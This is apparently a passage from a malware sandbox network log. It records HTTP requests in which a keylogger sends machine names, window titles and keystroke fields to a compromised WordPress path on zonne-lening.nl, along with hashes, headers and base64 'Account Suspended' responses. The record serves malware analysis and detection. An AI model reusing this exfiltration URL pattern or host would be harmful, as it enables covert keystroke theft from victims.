</head><body>
<h1>Found</h1>
<p>The doc...
9 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 04/05/39 11:11:26
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Tue, 29 Nov 2016 21:54:08 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
10 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:53%20PM text/html post.php 302 Found HTML 345.0 B 09/02/07 03:59:10
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT03OjUzJTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
e1a70d4fac582078efda3ddf5809e5d8372f6ecebe083aa3e2d9c4c9d5fb0691
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:53%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 03:53:56 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:53%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
11 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:53%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 09/02/07 13:20:35
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
